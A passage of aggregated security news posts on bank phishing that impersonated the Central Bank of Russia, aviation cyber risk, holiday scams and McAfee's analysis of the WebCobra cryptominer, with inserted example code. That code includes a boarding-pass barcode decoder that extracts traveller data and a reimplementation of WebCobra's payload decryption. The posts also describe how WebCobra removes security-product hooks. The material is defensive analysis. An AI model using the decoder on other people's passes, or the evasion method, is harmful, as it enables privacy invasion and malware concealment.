During the last year, Group-IB Threat Intelligence detected 27 million cards uploaded to card shops. The company’s records indicate that dumps account for 62% of the data sold, which means that POS Trojans are the main method of compromising payment cards. Unlike dumps, text data sells for much less in card shops: its total value amounted to $95.6 million, only 17% of the overall market value, compared to 19.9 million dumps, which cost as much as $567.8 million.

Group-IB in Asia

Group-IB is no stranger to the region. It recently announced the opening of its Global HQ in Singapore by the end of 2018, from where Group-IB will manage and keep developing its global threat-hunting infrastructure aimed at adversary-centric detection and proactive threat hunting. Group-IB’s portfolio of clients in Asia includes banks, financial and government organizations in Singapore, Thailand and other countries. Southeast Asia accounts for more than 30% of the company’s international revenue.

About the author Group-IB

Group-IB is one of the world’s leading providers of solutions aimed at the detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. The GIB Threat Intelligence cyber threat data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on the company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55,000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents, CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – Central Bank of Russia, cybercrime)

The post Group-IB presented latest cybercrime and nation-state hacking trends in Asia appeared first on Security Affairs.

Two hacker groups attacked Russian banks posing as the Central Bank of Russia

Group-IB has detected massive campaigns targeting Russian financial institutions posing as the Central Bank of Russia.

The emails were disguised to look as if they came from the Central Bank of Russia and FinCERT, the Financial Sector Computer Emergency Response Team. Group-IB experts have discovered that the attack on 15 November could have been carried out by the hacker group Silence, and the one on 23 October by MoneyTaker. Group-IB considers both cybercriminal groups among the most dangerous to Russian and international financial organisations.

November attack: Silence

On the morning of 15 November, Group-IB detected a malicious mass email campaign sent to Russian banks from a fake email address purporting to belong to the Central Bank of Russia (CBR). Of course, the CBR had nothing to do with the phishing campaign; the hackers faked the sender’s address. SSL certificates were not used for DKIM verification. Emails with the subject line “Information from the Central Bank of the Russian Federation” asked recipients to review the regulator’s decision “On the standardisation of the format of CBR’s electronic communications” and to implement the changes immediately. The documents in question were supposedly contained in the attached zip archives; however, by uncompressing these files users actually obtained Silence.Downloader, the tool used by the Silence hackers.
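A spoofed sender address of this kind is exactly what SPF and DKIM exist to catch, and a receiving gateway records their outcome in an Authentication-Results header (RFC 8601). The following is an added example, not Group-IB or CBR code, of the triage logic a mail-security team could run on inbound messages: it quarantines mail whose From: domain is on a list of senders that must authenticate, but whose SPF or DKIM result is missing, failing, or signed for a different domain, and separately notes archive attachments like the ones described above. The `TRUSTED_DOMAINS` policy, the strict exact-domain alignment rule, and both sample messages are constructed assumptions; cbr.ru is used only because it is the regulator named in the article.

```python
"""Flag inbound mail that claims a trusted sender but lacks aligned SPF/DKIM.

Added example, not code from the article. Reads the receiver's own
Authentication-Results header (RFC 8601) and the From: address, and returns the
reasons a message should be held. Alignment is checked as exact domain equality,
a deliberate simplification of DMARC's relaxed mode.
"""
import re
from email import message_from_string
from email.message import Message
from typing import Dict, List, Tuple

# Assumed policy: mail claiming these From: domains must carry aligned SPF and DKIM passes.
TRUSTED_DOMAINS = {"cbr.ru"}
ARCHIVE_SUFFIXES = (".zip", ".rar", ".7z")


def authentication_results(msg: Message) -> Dict[str, Tuple[str, str]]:
    """Extract (result, domain) for spf and dkim from every Authentication-Results header."""
    out = {"spf": ("none", ""), "dkim": ("none", "")}
    for hdr in msg.get_all("Authentication-Results", []):
        hdr = str(hdr)
        m = re.search(r"\bspf=(\w+)(?:[^;]*smtp\.mailfrom=([\w.-]+))?", hdr)
        if m:
            out["spf"] = (m.group(1).lower(), (m.group(2) or "").lower())
        m = re.search(r"\bdkim=(\w+)(?:[^;]*header\.d=([\w.-]+))?", hdr)
        if m:
            out["dkim"] = (m.group(1).lower(), (m.group(2) or "").lower())
    return out


def suspicious_reasons(raw: str) -> List[str]:
    """Return an empty list for mail that passes policy, otherwise the findings."""
    msg = message_from_string(raw)
    from email.utils import parseaddr
    _, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2].lower()
    if from_domain not in TRUSTED_DOMAINS:
        return []  # not claiming a sender this policy covers
    auth = authentication_results(msg)
    reasons = []
    spf_result, spf_domain = auth["spf"]
    if spf_result != "pass" or spf_domain != from_domain:
        reasons.append(f"SPF {spf_result} for {spf_domain or 'unknown'} does not authenticate {from_domain}")
    dkim_result, dkim_domain = auth["dkim"]
    if dkim_result != "pass" or dkim_domain != from_domain:
        reasons.append(f"DKIM {dkim_result} (d={dkim_domain or 'none'}) does not authenticate {from_domain}")
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        if name.endswith(ARCHIVE_SUFFIXES):
            reasons.append(f"archive attachment {name}")
    return reasons


# Constructed sample: a spoofed message. The From: claims the regulator, SPF fails, no DKIM.
PHISH = """\
From: "Bank of Russia" <info@cbr.ru>
To: ops@bank.example
Subject: Information from the Central Bank of the Russian Federation
Authentication-Results: mx.bank.example; spf=fail smtp.mailfrom=cbr.ru; dkim=none
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please review the attached decision and implement the changes immediately.
--b1
Content-Type: application/zip; name="decision.zip"
Content-Disposition: attachment; filename="decision.zip"

UEsDBAo=
--b1--
"""

# Constructed sample: a genuine notification with aligned SPF and DKIM passes and no attachment.
LEGIT = """\
From: "FinCERT" <fincert@cbr.ru>
To: ops@bank.example
Subject: Incident bulletin
Authentication-Results: mx.bank.example; spf=pass smtp.mailfrom=cbr.ru; dkim=pass header.d=cbr.ru
Content-Type: text/plain

Bulletin text.
"""

if __name__ == "__main__":
    for label, raw in (("phish", PHISH), ("legit", LEGIT)):
        print(label, suspicious_reasons(raw))
```

Two design points: the check trusts only the Authentication-Results header written by the receiving gateway, because a sender can add a forged one (production code should verify the `authserv-id` and strip headers received from outside); and messages from domains outside the policy are not scored, which is what keeps the rule from flooding the queue.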

Group-IB experts have observed that the style and format of the emails were almost identical to official correspondence from the regulator. The hackers most likely had access to samples of legitimate emails. According to Group-IB’s report published in September 2018, Silence gang members presumably were or are legally employed as pentesters and reverse engineers. As such, they are very familiar with documentation in the financial sector and the structure of banking systems.

October attack: MoneyTaker

The message sent on 23 October, also from a fake FinCERT email address, contained five attachments disguised to look like official CBR documents. Among them was a document entitled “Template Agreement on Cooperation with the Central Bank of the Russian Federation on Monitoring and Information Exchange .doc”. Three of the five files were empty decoy documents, but two contained a download of the Meterpreter stager. To carry out the attack, the hackers used self-signed SSL certificates. Furthermore, the server infrastructure involved had been used in previous attacks conducted by MoneyTaker. All these factors led to the conclusion that MoneyTaker was behind the October attack.

Group-IB experts believe that hackers managed to obtain the samples of CBR documents from earlier compromised mailboxes belonging to employees of Russian banks. MoneyTaker used the information obtained to design emails and documents purporting to be from the CBR to conduct targeted attacks on banks.

A spear-phishing campaign set up to look as if it came from the Central Bank is a relatively widespread attack vector among cybercriminals; it has been used by groups such as Buhtrap, Anunak, Cobalt, and Lurk. In March 2016, for example, cybercriminals sent phishing emails from info@fincert.net. As for genuine notifications from the Central Bank of Russia, hackers from Lurk and Buhtrap have in the past used them to send malware to bank employees.

“Since July, to share information, FinCERT has been using an automated incident processing system that makes it possible to securely and quickly share information about incidents and unauthorized operations based on the “Feed-Antifraud” database,” comments the Central Bank’s press service. “The backup channel for sharing information is email. All messages sent via email contain FinCERT’s electronic signature.”

Information and indicators of attack (IoAs) from the 23 October and 15 November attacks were quickly uploaded to Group-IB Threat Intelligence, which made it possible to warn Group-IB clients among Russian banks about the potential threat. Group-IB TDS (Threat Detection System) detected both phishing campaigns and signaled the malicious activity. The Group-IB system blocked this threat in inline mode.

“MoneyTaker and Silence are two of the four most dangerous hacker groups that present a real threat to international financial organisations,” said Rustam Mirkasymov, Group-IB Head of Dynamic Analysis of malware department and threat intelligence expert. “Hackers from MoneyTaker use all possible attack vectors when targeting banks. For example, they can send spear-phishing emails, carry out a drive-by attack, or test a bank’s network infrastructure for existing vulnerabilities. After gaining access to the network’s internal nodes, hackers are easily able to carry out attacks and withdraw money through ATMs, card processing or interbank transfers systems (in Russia, AWS CBR (the Russian Central Bank’s Automated Workstation Client)). Silence, for their part, are less resourceful and use only a tried and tested attack method – phishing emails. Unlike their colleagues, however, they pay closer attention to the content and design of their phishing emails.”

About Silence

Silence is an active though very small group of Russian-speaking hackers. Group-IB first detected the group’s activity in 2016. Over the course of their ‘work’, Silence attacked bank management systems, card processing systems, and the Russian interbank transfer system (AWS CBR). The gang’s targets are mainly located in Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan, although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia. A month ago, Group-IB detected a spear-phishing attack targeting companies in the United Kingdom. The report “Silence: Moving into the darkside” was published in September 2018 and was the first to describe the group’s tactics and tools.

About MoneyTaker

MoneyTaker is a hacker group that is thought to be responsible for 16 attacks in the United States, 5 attacks on Russian banks, and 1 in the United Kingdom. Apart from money, the criminals steal documentation about interbank payment systems that is necessary for preparing future attacks. The group also carries out attacks through intermediaries by hacking banks’ partners, IT companies, and financial product providers. In December 2017, Group-IB published its first report on the group: “MoneyTaker: 1.5 years of silent operations”.


Pierluigi Paganini

(Security Affairs – Central Bank of Russia, cybercrime)

The post Two hacker groups attacked Russian banks posing as the Central Bank of Russia appeared first on Security Affairs.

Online shoppers continue to engage in risky behavior

Findings from a new McAfee survey reveal the risky habits of online shoppers, including using unsecured Wi-Fi for online shopping and purchasing items from online retailers they are not fully confident are genuine (51 percent). This highlights the need for consumers to slow down and consider the risks of unsafe purchasing behavior that could lead to identity theft or financial loss. Last year consumers spent $453.46 billion on the web for retail purchases, which was … More

The post Online shoppers continue to engage in risky behavior appeared first on Help Net Security.

Compromising vital infrastructure: air traffic control

While most of us know that flying is the safest mode of transport, we still feel that sigh of relief when the plane has made its landing on the runway and we can text our loved ones that we have arrived safe and sound. Accidents may be rare, but they’re often shocking and horrific and accompanied by the loss of many lives. Unfortunately, they also tend to make the news, which only heightens fear.

In this blog post, we look at the dangers related to flying from a cybersecurity perspective. As we know, cybercriminals are motivated mostly by money, power, and ego—and messing with air traffic and air traffic control can boost any of those factors. While the majority of these cybersecurity incidents result in data breaches, make no mistake: Attacks on this vital infrastructure could lead to much more grim consequences.

Air traffic control

Air traffic can roughly be divided into four general categories:

  • Public transport
  • Cargo and express freight
  • Military operations
  • Smaller aircraft (recreational, training, helicopters, and drones)

Organizations like the ATO and EUROCONTROL manage the air traffic across entire continents, communicating with commercial and military bodies to control the coordination and planning of air traffic in their designated territory. These organizations work closely together, as there are many intercontinental flights that pass from one territory to another.

Air traffic control organizations need to react quickly to incidents, and their instructions should be followed to the T. They need flawless communication to work properly, as they are crucial to maintaining the normal flow of air traffic. Therefore, these organizations and their related systems are heavily computerized. This makes them primary targets for cyberattacks.

Public transportation

Using airlines as a means of public transport brings with it certain security-related dangers. Online bookings have led to many data leaks. Recently we have learned about breaches at Cathay Pacific, British Airways, Arik Air, and Air Canada. Some of these breaches were website hacks. Others only concerned users of mobile apps.

Another privacy-related cause for worry is the type of information displayed on an airline ticket or boarding pass. Some people post pictures of their tickets on social media, and the Aztec codes used on those tickets are easy to decipher. This can provide a threat actor with a wealth of personally identifiable information, such as payment method, confirmation numbers, names, and addresses.
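To make "easy to decipher" concrete: the Aztec (or PDF417/QR) code on a boarding pass carries the IATA Bar Coded Boarding Pass (BCBP) string, whose first 60 characters are fixed-width mandatory fields that any barcode reader can recover from a photo. The decoder below is an added example, not code from the Malwarebytes post, and is the kind of thing a security awareness team can run on its own passes to show travellers what a posted photo gives away. The sample string is constructed; the name, booking reference and flight are fictitious, and the field table reflects the mandatory items of the "M" format as documented by IATA.

```python
"""Decode the mandatory fields of an IATA BCBP (bar-coded boarding pass) string.

Added example, not the article's code. The fixed-width mandatory block is 60
characters; the conditional block that may follow is returned raw. Intended for
inspecting one's own boarding pass to see which personal data it exposes.
"""
from datetime import date, timedelta
from typing import Dict

# (field name, width) in order, for the mandatory items of the BCBP "M" format.
MANDATORY = [
    ("format_code", 1), ("legs", 1), ("passenger_name", 20),
    ("eticket_indicator", 1), ("pnr", 7), ("from_airport", 3), ("to_airport", 3),
    ("carrier", 3), ("flight_number", 5), ("julian_date", 3), ("compartment", 1),
    ("seat", 4), ("checkin_sequence", 5), ("passenger_status", 1),
    ("conditional_size_hex", 2),
]
MANDATORY_LEN = sum(w for _, w in MANDATORY)   # 60


def parse_bcbp(data: str, year: int) -> Dict[str, str]:
    """Split the mandatory block into named fields and resolve the Julian flight date.
    `year` must be supplied because the barcode carries only the day of year."""
    if len(data) < MANDATORY_LEN or data[0] != "M":
        raise ValueError("not a BCBP 'M' format string")
    fields, pos = {}, 0
    for name, width in MANDATORY:
        fields[name] = data[pos:pos + width].strip()
        pos += width
    day_of_year = int(fields["julian_date"])
    fields["flight_date"] = (date(year, 1, 1) + timedelta(days=day_of_year - 1)).isoformat()
    cond_len = int(fields["conditional_size_hex"], 16)
    fields["conditional_data"] = data[pos:pos + cond_len]
    return fields


def exposed_pii(fields: Dict[str, str]) -> Dict[str, str]:
    """The subset a stranger learns from a boarding-pass photo: who, which booking, which flight, which seat."""
    keys = ("passenger_name", "pnr", "carrier", "flight_number", "from_airport",
            "to_airport", "flight_date", "seat")
    return {k: fields[k] for k in keys}


# Constructed sample, built field by field so the widths are exact (fictitious traveller and booking).
SAMPLE = (
    "M" + "1" + "DOE/JANE".ljust(20) + "E" + "XY7Z9Q".ljust(7)
    + "LHR" + "JFK" + "BA".ljust(3) + "0117".ljust(5) + "326" + "Y"
    + "014A" + "0042".ljust(5) + "1" + "00"
)

if __name__ == "__main__":
    for k, v in exposed_pii(parse_bcbp(SAMPLE, 2018)).items():
        print(f"{k:16} {v}")
```

The `pnr` field is the booking reference the article calls a confirmation number; together with the surname it is the usual key to an airline's "manage my booking" page, which is why the advice to keep boarding-pass photos off social media is about more than the name printed on the pass.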

Travelers should also pay extra attention to spam that comes in looking convincingly like a ticket confirmation. This type of spam has been around for a few years, and is usually easy to discard—except when you actually happened to have booked with the same airline being spoofed.


For more travel safety tips read: Tips for safe summer travels: your cybersecurity checklist


Air cargo

Air cargo is by definition always in a hurry. If delivery of the cargo wasn’t urgent, it would have been put on a less costly mode of transportation. This makes shipment information valuable to both thieves and scammers. How often have you received a phishing mail claiming to be shipment information from one of the major express freighters such as DHL, FedEx, or UPS? If a threat actor were to know you were expecting air cargo or an express delivery from a particular company, these blind attempts could become more targeted and efficient.

Military

In warfare, competition for air supremacy is fierce. It is defined by the USDoD and NATO as the “degree of air superiority wherein the opposing air force is incapable of effective interference.” There are several levels of control of the air, but the general idea is that air supremacy is a major goal on the way to victory.

In modern warfare, you can expect every side to try every possible way to gain control of the air, including cyberattacks on the enemies’ air traffic infrastructure. In such a scenario, the infrastructure includes planes, aircraft factories, airports, air traffic control, and the lines of communications between all of them.

Recreational use of the airways

Interfering with recreational air traffic may not be a target for cybercriminals, but recreational traffic can, and has been known to, hinder other forms of air traffic. Drones have been reported in hundreds of near misses with commercial airliners, and one even managed to land on the grounds of the White House. Considering that the number of drones is expected to grow exponentially in years to come, with increasing commercial use cases such as delivery, photography, inspection, and reconnaissance, expect more interference problems to emerge.

Drones come in many shapes and sizes, and the same is true of their level of security, but you can safely assume that most of them can be remotely hacked. In the US, drone operations are not allowed within five miles of an airport unless the operator notifies the airport and its air traffic control tower first. One would expect these rules to become stricter as we proceed.

Terrorist attacks

Aircraft have been hijacked by terrorists in the past, the most famous example being 9/11, when terrorists boarded four different aircraft, overpowered the crews, and flew two planes into the World Trade Center towers and one into the Pentagon; the fourth crashed into a field in Pennsylvania. These physical, in-person hijackings are the reason for the extensive security measures you encounter at every major airport.

But hijackers don’t have to be physically present to cause huge damage. As researchers have demonstrated in the past, aircraft systems can be attacked remotely, and malware can infect the computer systems on board.

Ransomware victims

Like any other industry, you will find many ransomware victims in the aviation and air traffic sector.

The flight information screens on Bristol Airport went dark after the airport’s administration system was the subject of a cyberattack. The attack was suspected to be ransomware, although I could not find official confirmation for this. In this case, flight operations were (thankfully) not affected.

Boeing was hit by WannaCry in March 2018, almost a year after the original May 2017 outbreak, although the incident was played down afterwards because production lines had not been disturbed.

As mentioned in an earlier blog post, air and express freight carrier FedEx has been a ransomware victim twice: once through its TNT division, hit by NotPetya, and once in its own delivery unit, hit by WannaCry.

Targeted cyberattacks

A targeted attack was suspected when malware was found in the IT network of Boryspil International Airport in Ukraine, a network that reportedly included the airport’s air traffic control system. Given the hostile relations between Ukraine and Russia, attribution quickly swerved to BlackEnergy, the Russian APT group held responsible for many cyberattacks on Ukraine.

Ukrainian aircraft builder Antonov was also a victim of NotPetya, ransomware that appeared to target Ukrainian users. In hindsight, it may only have looked that way because the malware was spread through the software update mechanism of M.E.Doc, a Ukrainian tax accounting package.

Budget concerns

In 2017, the Air Traffic Control Association (ATCA) published a white paper issuing the following warning:

Where budgets are concerned, cybersecurity is treated reactively instead of proactively.

This was after a 2016 report by the Ponemon Institute that found organizations did not budget for the technical, administrative, testing, and review activities that are necessary to operate a truly secure system. Instead, at least two-thirds of businesses waited until they had experienced a cyberattack or data breach to hire and retain security vendors to help.

The budgeting process for systems architecture in the aviation industry does not account for built-in security. It would certainly make sense to include it if we want to protect our passengers and cargo making use of this vital infrastructure. It would even be more cost effective, since retroactively securing a system after an attack is usually much more expensive than preventing one.

So, while physical security at airports has been tightened significantly, the cybersecurity of this important infrastructure still needs a lot of work, especially when you consider the sheer number of cyberattacks on the industry in the last few years.

Those in the aviation, air traffic, and air cargo industries need to include cybersecurity in their budget and design proposals for 2019, otherwise the excrement might really hit the propeller.

The post Compromising vital infrastructure: air traffic control appeared first on Malwarebytes Labs.

Report: Small, Stealthy Groups Behind Worst Cybercrimes

A small group of cybercriminals is responsible for the most damaging cyberattacks, often with the help of state sponsorship. Still, low-level criminal activity on the dark web poses the most widespread and immediate security threat, with cryptocurrency mining, ransomware and malware all on the rise, a recent report has found.


Online shopping fraud to surge during Black Friday and Cyber Monday

New benchmark data from ACI Worldwide revealed a projected 14 percent increase in fraud attempts during the upcoming 2018 peak holiday season. Based on hundreds of millions of merchant transactions, the data shows that fraud attempts are going to be at their highest across the Black Friday and Cyber Monday weekend. Principal findings from the data include: Fraud attempts expected to increase 14% during 2018 peak holiday season Cross Channel fraud continues to grow: In … More

The post Online shopping fraud to surge during Black Friday and Cyber Monday appeared first on Help Net Security.

Holiday Stress Can Make You More Careless Online

Holiday stress. Every year, come November, my resting heart rate starts to rise: the festive season is approaching. Not only is there so much to do but there’s so much to spend money on. There are presents to purchase, feasts to prepare and party outfits to buy. Throw in a holiday to fill the long Summer break, and both the credit cards and my stress levels are starting to rapidly increase!

Holiday Financial Stress Results in Poor Decision Making Online

But did you know that this stress can affect our online safety? Research conducted by McAfee shows that almost 80% of us believe the holiday period causes financial stress, and nearly half of us (46%) believe that stress can make us behave carelessly online. Risky behaviours like using public Wi-Fi to snag a last-minute purchase, or buying from an unfamiliar website because it’s cheaper, put our online safety at risk.

Aussie Shoppers Love an Online Bargain 

In 2017, Aussies spent a record $21.3 billion online – a whopping 19% increase over 2016. McAfee’s research shows that Aussie consumers love securing a bargain online – who doesn’t!! But many will seek out a great deal even if it means potentially jeopardising their online safety. The research shows that 64% of consumers are willing to use an unfamiliar website if it means they can save money on their purchase. Even more concerning, a third of Aussies admitted to clicking links in suspicious emails for better deals!! Yikes!!

The Thing Is, Cyber Criminals Love Your Holiday Shopping Too

Cyber criminals work very hard to take advantage of us during the busy holiday season. They come up with all sorts of ingenious ways to target time-poor and budget-conscious consumers online, knowing very well that many of us will cut corners with our online security, particularly if we think we can save money on presents, outfits or even a holiday.

And they scheme accordingly: charity phishing emails, fake online stores, bogus delivery emails, e-voucher scams and more. Cyber criminals have tried and tested strategies to either steal our personal information or our identity.

How You Can Stay Safe While Shopping Online This Holiday Season

So, don’t feel like you need to battle the crowds at Westfield this festive season. You can still shop online safely if you follow a few simple steps:

  1. Connect with Caution

Public Wi-Fi is just so convenient, but it is a risky business: other users of the same network could snoop on your traffic and pick up your personal information. So, if you absolutely have to use public Wi-Fi for a great online shopping deal, always use a Virtual Private Network (VPN) such as McAfee Safe Connect, which encrypts the connection between your device and the VPN service. Keep in mind that a VPN only protects your traffic in transit; it does not make a fake shop any safer, so the next two steps still apply.

  2. Think Before You Click

One of the easiest ways for a cyber criminal to target victims is using phishing emails to trick consumers into sharing their personal information. Phishing emails could be disguised as holiday savings or even a shopping notification. Instead of clicking on a link in an email, always check directly with the source to verify an offer or shipment.

  3. Always Shop with Security Protection

Shopping online without security protection is like driving without a seat belt – dangerous! Comprehensive antivirus software like McAfee Total Protection will help shield your devices against malware, phishing attacks and other threats. It also provides a firewall, an anti-spam function, parental controls and a password management tool. A complete no-brainer!

But this year, I’m going to commit to lowering my stress. That way I can really enjoy my time with my family and friends. To get ahead of the game I plan to:

  • Start my online shopping earlier so I don’t ‘cut corners’ with my online safety,
  • Create a realistic budget, and
  • Start filling my freezer with some holiday food – now

And most importantly, get that resting heart rate under control!!

Happy Holidays Everyone!

Alex xx

The post Holiday Stress Can Make You More Careless Online appeared first on McAfee Blogs.

Preventing WebCobra Malware From Slithering Onto Your System

Cryptocurrency mining is how transactions are verified and added to the public ledger, the database of all transactions made with a particular cryptocurrency. Miners bundle pending transactions into blocks and race other miners to solve a computationally expensive puzzle; the winner earns a reward in that currency. This takes a lot of computing power, which is why serious mining runs on dedicated hardware. Unfortunately, miners can be put to more nefarious use when they are bundled into malicious software. Enter WebCobra, malware that uses victims’ computers to mine cryptocurrency for cybercriminals, a practice also known as cryptojacking.

How does WebCobra malware work, exactly? It arrives bundled with rogue PUP (potentially unwanted program) installers. Its dropper, a Trojan whose only job is to install the real payload, checks the victim’s system and picks a miner to match. On 32-bit Windows it injects a Cryptonight miner (the algorithm used for Monero) into a legitimate system process, where it quietly consumes nearly all of the CPU. On 64-bit systems with a supported graphics card it downloads Claymore’s Zcash miner from a remote server into a hidden folder and runs it from there.

The most threatening part of WebCobra malware is that it can be very difficult to detect. Often the only sign of its presence is decreased computer performance. Before the miner runs, the dropper also checks for security products on the system. Many security products hook Windows API functions, the entry points programs use to talk to the operating system, in order to watch what software does. WebCobra loads clean copies of the relevant system libraries from disk and writes their original bytes back over the hooked functions, which removes the hooks and blinds that monitoring. That is how it can remain undetected for a long time.

While cryptocurrency mining can be a harmless hobby, users should be cautious of criminal miners with poor intentions. So, what can you do to prevent WebCobra from slithering onto your system? Check out the following tips:

  • If your computer slows down, be cautious. It can be hard to determine if your device is being used for a cryptojacking campaign. One way you can identify the attack – poor performance. If your device is slow or acting strange, start investigating and see if your device may be infected with malware.
  • Use a comprehensive security solution. Having your device infected with malware will not only slow down its performance but could potentially lead to exposed data. To secure your device and help keep your system running smoothly and safely, use a program like McAfee Total Protection. McAfee products are confirmed to detect WebCobra.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Preventing WebCobra Malware From Slithering Onto Your System appeared first on McAfee Blogs.

Secret Sister scam returns in time for Christmas

The festive season may be imminent, but it’s a Facebook Secret Sister (not Santa) you have to steer clear of. Secret Sister has been a mainstay of Yuletide scams since at least 2015, and has come back around once more. But what is it?

Your office probably has a Secret Santa scheme in place. You draw names from a hat, and you secretly buy the named person a gift. It’s all pretty straightforward, and a great source of unwanted deodorants and novelty kitchenware. Secret Sister isn’t quite as nice, and could drop you in a great deal of trouble. You probably won’t even get your hands on the deodorant.

How the scam works

Chain letters of the Secret Sister variety used to be pushed through your front door. In this case, the chain letter lands in your digital mailbox instead of your real one. You could in theory receive one anywhere, and people have reported getting them everywhere from Reddit and Facebook to various social portals and forums. For whatever reason, Facebook seems to be the scammers’ favourite place to get the ball rolling on this particular scam; the possibility of sending it pinging around large social connection chains is too good to resist.

Secret Sister sample 

The messages can vary wildly, but one of the most popular ones going back a year or so reads as follows:

Anyone interested in a Holiday Gift exchange? I don’t care where you live – you are welcome to join. I need 6 (or more) ladies of any age to participate in a secret sister gift exchange. You only have to buy ONE gift valued at $10 or more and send it to one secret sister and you will receive 6-36 in return!

Let me know if you are interested and I will send you the information!

Please don’t ask to participate if you are not willing to spend the $10.

TIS THE SEASON! and its getting closer. COMMENT if You’re IN and I will send you a private message. Please don’t comment if you are not interested and aren’t willing to send the gift!

It might sound promising to many people reading it, but it really won’t do you much good.

From chains to pyramids

Chain letters are essentially pyramid schemes. Pyramid schemes involve funneling money from bottom to top of the pyramid, benefiting those at the top and not many others. If you’re there from the get-go, your chances of making a good return increase somewhat. For everyone else, you’re probably going to lose out.

Where this becomes complicated, at least in the US, is that these schemes tend to resemble gambling, which means you could easily end up breaking the law. From the US Postal Inspection Service website:

They’re illegal if they request money or other items of value and promise a substantial return to the participants. Chain letters are a form of gambling, and sending them through the mail (or delivering them in person or by computer, but mailing money to participate) violates Title 18, United States Code, Section 1302, the Postal Lottery Statute

Secret Sister data harvesting

You definitely won’t receive a pile of free gifts. However, you could be dragged into some sort of dubious postal scam with mail fraud penalties instead. There’s also the risk of identity theft to consider. Mail fraud scammers typically ask for various pieces of personal information. You could end up handing them your name, address, phone number, alongside a variety of online profiles to tie them to. This could be all an enterprising criminal needs to do some additional damage, especially if they persist in branching out from your profile to those of your friends.

No matter how appealing the prospect of easy free gifts sounds as 2018 slowly draws to a close, don’t fall for it. These types of antics have been around for a long time, and moving into the digital realm doesn’t make them any safer. If you’re not based in the US, you may not have the legal worry to deal with as a result but that’s scant consolation.

Our advice is to stick to Secret Santa, and give his sister nothing more than a Return to Sender.

The post Secret Sister scam returns in time for Christmas appeared first on Malwarebytes Labs.

WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency

The authors thank their colleagues Oliver Devane and Deepak Setty for their help with this analysis.

McAfee Labs researchers have discovered new Russian malware, dubbed WebCobra, which harnesses victims’ computing power to mine for cryptocurrencies.

Coin mining malware is difficult to detect. Once a machine is compromised, a malicious app runs silently in the background with just one sign: performance degradation. As the malware increases power consumption, the machine slows down, leaving the owner with a headache and an unwelcome bill, as the energy it takes to mine a single bitcoin can cost from $531 to $26,170, according to a recent report.

The increase in the value of cryptocurrencies has inspired cybercriminals to employ malware that steals machine resources to mine crypto coins without the victims’ consent.

The following chart shows how the prevalence of miner malware follows changes in the price of Monero cryptocurrency.

Figure 1: The price of cryptocurrency Monero peaked at the beginning of 2018. The total samples of coin miner malware continue to grow. Source: https://coinmarketcap.com/currencies/monero/.

McAfee Labs has previously analyzed the cryptocurrency file infector CoinMiner; and the Cyber Threat Alliance, with major assistance from McAfee, has published a report, “The Illicit Cryptocurrency Mining Threat.” Recently we examined the Russian application WebCobra, which silently drops and installs the Cryptonight miner or Claymore’s Zcash miner, depending on the architecture WebCobra finds. McAfee products detect and protect against this threat.

We believe this threat arrives via rogue PUP installers. We have observed it across the globe, with the highest number of infections in Brazil, South Africa, and the United States.

Figure 2: McAfee Labs heat map of WebCobra infections from September 9–13.

This cryptocurrency mining malware is uncommon in that it drops a different miner depending on the configuration of the machine it infects. We will discuss that detail later in this post.

Behavior

The main dropper is a Microsoft Installer (MSI) package that checks the running environment. On x86 systems, it injects the Cryptonight miner code into a running process and launches a process monitor. On x64 systems, it checks the GPU configuration, then downloads and executes Claymore’s Zcash miner from a remote server.

Figure 3: WebCobra’s installation window.

After launching, the malware drops and extracts a password-protected Cabinet (CAB) archive with this command:

Figure 4: The command to unzip the dropped file.

The CAB file contains two files:

  • ERDNT.LOC: a DLL that decrypts data.bin
  • data.bin: the encrypted malicious payload

The CAB file uses the following script to execute ERDNT.LOC:

Figure 5: The script to load the DLL file, ERDNT.LOC.

ERDNT.LOC decrypts data.bin byte by byte and passes the execution flow to it. Each plaintext byte is derived from the corresponding encrypted byte with this routine (the arithmetic is on single bytes, so the additions wrap modulo 256):

  • [PlainText_Byte] = (([EncryptedData_Byte] + 0x2E) ^ 0x2E) + 0x2E

Figure 6: The decryption routine. 
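As an added example (not McAfee’s code, and not taken from the sample), here is the routine above implemented in Python and run against a constructed stand-in for data.bin. The sample bytes and the encrypt helper used to produce them are my own; the decryption formula is the one in the report, with each step reduced modulo 256 because it operates on single bytes:

```python
# Added example (not McAfee's code): the byte transform the report describes
# for ERDNT.LOC decrypting data.bin, applied to constructed sample data.
# Plain = ((Enc + 0x2E) ^ 0x2E) + 0x2E, every step taken modulo 256.

KEY = 0x2E


def decrypt_byte(c: int) -> int:
    """Recover one plaintext byte from one encrypted byte."""
    return ((((c + KEY) & 0xFF) ^ KEY) + KEY) & 0xFF


def encrypt_byte(p: int) -> int:
    """Inverse of decrypt_byte: undo each step in reverse order.
    Only needed here to build test data; the malware ships data.bin already
    encrypted."""
    return ((((p - KEY) & 0xFF) ^ KEY) - KEY) & 0xFF


def decrypt(data: bytes) -> bytes:
    return bytes(decrypt_byte(c) for c in data)


def encrypt(data: bytes) -> bytes:
    return bytes(encrypt_byte(p) for p in data)


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check an analyst applies to the decrypted payload: a Windows
    executable starts with the 'MZ' signature."""
    return blob[:2] == b"MZ"


# Constructed stand-in for data.bin: an 'MZ' header plus filler, encrypted
# with the inverse transform so the decryptor has something to work on.
SAMPLE_PLAINTEXT = b"MZ\x90\x00\x03\x00\x00\x00" + b"payload-goes-here"
SAMPLE_DATA_BIN = encrypt(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    recovered = decrypt(SAMPLE_DATA_BIN)
    print("encrypted:", SAMPLE_DATA_BIN.hex())
    print("decrypted:", recovered, "PE header:", looks_like_pe(recovered))
```

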